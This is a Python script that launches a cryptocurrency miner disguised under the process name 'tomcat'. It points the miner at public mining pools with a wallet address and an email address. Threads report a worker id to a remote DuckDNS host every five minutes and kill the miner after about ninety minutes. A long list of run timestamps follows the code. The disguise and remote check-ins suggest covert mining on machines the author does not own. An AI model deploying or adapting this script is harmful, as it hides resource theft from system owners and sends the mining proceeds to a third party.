import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:14:07.320511
#2018-02-17 16:02:06.834528
#2018-02-17 17:51:04.234257
#2018-02-17 19:38:02.076008
#2018-02-17 21:26:07.369469
#2018-02-17 23:11:01.979297
#2018-02-18 00:58:07.456970
#2018-02-18 02:46:06.792641
#2018-02-18 04:36:03.446321
#2018-02-18 06:27:01.888010
#2018-02-18 08:16:05.793133
#2018-02-18 10:04:04.008963
#2018-02-18 11:50:05.837946
#2018-02-18 13:35:08.627445
#2018-02-18 15:25:07.917571
#2018-02-18 17:14:01.694807
#2018-02-18 19:02:03.798242
#2018-02-18 20:49:06.207235
#2018-02-18 22:36:06.868190
#2018-02-19 00:24:06.622339
#2018-02-19 02:10:02.543400
#2018-02-19 03:57:06.949978
#2018-02-19 05:43:07.017573
#2018-02-19 07:31:07.533034
#2018-02-19 09:21:07.685446
#2018-02-19 11:10:01.756727
#2018-02-19 12:57:08.089483
#2018-02-19 14:44:06.863804
#2018-02-19 16:34:06.605341
#2018-02-19 18:22:01.617494
#2018-02-19 20:09:04.955027
#2018-02-19 21:59:03.387573
#2018-02-19 23:44:09.393022
#2018-02-20 01:32:07.413889
#2018-02-20 03:20:07.306292
#2018-02-20 05:07:05.302312
#2018-02-20 06:51:07.649985
#2018-02-20 08:37:06.190341
#2018-02-20 10:21:06.824953
#2018-02-20 12:07:08.878497
#2018-02-20 13:53:12.316550
#2018-02-20 15:39:05.280789
#2018-02-20 17:24:02.206971
#2018-02-20 19:13:01.846905
#2018-02-20 21:02:04.083396
#2018-02-20 22:48:07.927344
#2018-02-21 00:32:07.537609
#2018-02-21 02:19:04.052243
#2018-02-21 04:06:06.839286
#2018-02-21 05:53:01.891931
#2018-02-21 07:41:07.231092
#2018-02-21 09:26:05.025808
#2018-02-21 11:15:07.550880
#2018-02-21 13:03:01.850444
#2018-02-21 14:50:13.420421
#2018-02-21 16:38:04.991459
#2018-02-21 18:27:05.383459
#2018-02-21 20:12:03.697474
#2018-02-21 22:01:07.563188
#2018-02-22 01:01:05.113239
#2018-02-22 01:58:01.334327
#2018-02-22 03:31:02.203162
#2018-02-22 05:02:05.790784
#2018-02-22 06:33:06.879363
#2018-02-22 08:09:04.989921
#2018-02-22 09:44:07.205629
#2018-02-22 11:15:04.214299
#2018-02-22 12:47:07.821364
#2018-02-22 14:21:02.222915
#2018-02-22 15:56:05.661160
#2018-02-22 17:27:08.716706
#2018-02-22 19:04:04.282641
#2018-02-22 20:43:06.479846
#2018-02-22 22:11:04.555990
#2018-02-22 23:44:09.021433
#2018-02-23 01:18:05.263133
#2018-02-23 02:52:03.877942
#2018-02-23 04:27:01.642075
#2018-02-23 05:57:05.166513
#2018-02-23 07:29:01.651115
#2018-02-23 09:30:07.221374
#2018-02-23 11:17:05.374223
#2018-02-23 12:38:04.782010
#2018-02-23 14:05:11.427772
#2018-02-23 15:42:01.244045
#2018-02-23 17:13:06.053491
#2018-02-23 18:48:01.714652
#2018-02-23 20:22:06.541010
#2018-02-23 21:55:04.554570
#2018-02-23 23:32:07.844190
#2018-02-24 01:01:07.236974
#2018-02-24 02:46:07.016707
#2018-02-24 04:21:04.794662
#2018-02-24 06:08:04.439947
#2018-02-24 07:56:01.733918
#2018-02-24 09:40:01.779617
#2018-02-24 11:35:06.823704
#2018-02-24 13:25:04.217250
#2018-02-24 15:13:06.774572
#2018-02-24 17:02:05.263499
#2018-02-24 18:51:06.313102
#2018-02-24 20:40:02.046365
#2018-02-24 22:48:03.984275
#2018-02-25 03:04:04.576752
#2018-02-25 06:58:07.581900